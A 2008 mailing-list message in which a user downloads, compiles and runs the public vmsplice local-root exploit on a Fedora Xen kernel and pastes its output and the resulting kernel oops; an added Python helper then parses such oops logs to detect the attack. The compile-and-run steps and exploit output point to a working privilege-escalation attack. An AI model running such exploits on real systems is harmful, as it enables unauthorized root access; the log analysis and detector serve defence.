On Feb 12, 2008 11:15 PM, Daniel P. Berrange <berrange@redhat.com> wrote:
http://justfuckinggoogleit.com/


Wow, got it from http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c

gcc -o exploit 27704.c


./exploit

gimme at 2.6.21-2952.fc8xen (didn't get root shell)

Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ef4000 .. 0xb7f26000
Segmentation fault
[asraikhn@xxxx ~]$
Message from syslogd@xxxx at Feb 12 18:21:48 ...
kernel: Oops: 0000 [#1]
kernel: SMP
kernel: CPU: 0
kernel: EIP: 0061:[<080487f5>] Not tainted VLI
kernel: EFLAGS: 00210293 (2.6.21-2952.fc8xen #1)
kernel: EIP is at 0x80487f5
kernel: eax: e9000003 ebx: 00000004 ecx: 00000000 edx: 00004000
kernel: esi: c3c79f8c edi: ffffffe0 ebp: c3c79e70 esp: c3c79e5c
kernel: ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0069
kernel: Process exploit (pid: 26415, ti=c3c79000 task=c14217d0 task.ti=c3c79000)
kernel: Stack: 0000000d 00000000 e9000003 e9000003 00000004 00000001 c1058163 c108adbd
kernel: 00000000 00000000 00000000 00000000 00000030 00000030 bfe230b8 c108b9e7
kernel: ffffffd0 00000000 00000000 c3c79f4c 00000000 c3c7a00c c181b120 c039ba00
kernel: Call Trace:
kernel: [<c1058163>] put_compound_page+0x13/0x14
kernel: [<c108adbd>] splice_to_pipe+0x1c7/0x1d6
kernel: [<c108b9e7>] sys_vmsplice+0x262/0x28b
kernel: =======================
kernel: Code: Bad EIP value.
kernel: EIP: [<080487f5>] 0x80487f5 SS:ESP 0069:c3c79e5c

regards
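The oops above is the kind of artefact an administrator finds in syslog after a failed attempt like this one: the call trace ends in sys_vmsplice and the faulting EIP (0x80487f5) is a user-space address, meaning the kernel was redirected into the process's own code. The triage helper below is an added example, not part of this thread or the exploit; it strips the repeated syslogd wall headers, extracts process, trace and EIP from a constructed copy of that oops, and flags the vmsplice-plus-user-EIP combination. The 0xC0000000 boundary assumes the default i386 3G/1G split.

```python
import re

# Constructed sample in the shape of the oops quoted in the thread above.
SAMPLE = """\
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: Process exploit (pid: 26415, ti=c3c79000 task=c14217d0 task.ti=c3c79000)
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: Call Trace:
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: [<c1058163>] put_compound_page+0x13/0x14
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: [<c108adbd>] splice_to_pipe+0x1c7/0x1d6
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: [<c108b9e7>] sys_vmsplice+0x262/0x28b
Message from syslogd@host at Feb 12 18:21:48 ...
kernel: EIP: [<080487f5>] 0x80487f5 SS:ESP 0069:c3c79e5c
"""

PROC_RE = re.compile(r"kernel: Process (\S+) \(pid: (\d+)")
FRAME_RE = re.compile(r"kernel: \[<([0-9a-f]+)>\] (\w+)\+0x")
EIP_RE = re.compile(r"kernel: EIP: \[<([0-9a-f]+)>\]")

# Assumed: i386 kernel with the default 3G/1G split, so anything below
# this address belongs to the user-space mapping of the faulting process.
USER_KERNEL_BOUNDARY = 0xC0000000

def parse_oops(text):
    """Drop syslogd wall headers and pull out process, call trace and EIP."""
    info = {"process": None, "pid": None, "trace": [], "eip": None}
    for line in text.splitlines():
        if line.startswith("Message from syslogd"):
            continue  # wall banner repeated before every kernel line
        m = PROC_RE.search(line)
        if m:
            info["process"], info["pid"] = m.group(1), int(m.group(2))
            continue
        m = FRAME_RE.search(line)
        if m:
            info["trace"].append(m.group(2))  # symbol name of each frame
            continue
        m = EIP_RE.search(line)
        if m:
            info["eip"] = int(m.group(1), 16)
    return info

def suspicious(info):
    """True when the oops is in the vmsplice path and EIP points into user space."""
    in_vmsplice = "sys_vmsplice" in info["trace"]
    user_eip = info["eip"] is not None and info["eip"] < USER_KERNEL_BOUNDARY
    return in_vmsplice and user_eip
```

Run it over real syslog by feeding the collected lines to parse_oops and alerting on suspicious; a legitimate kernel crash normally reports an EIP inside the kernel mapping.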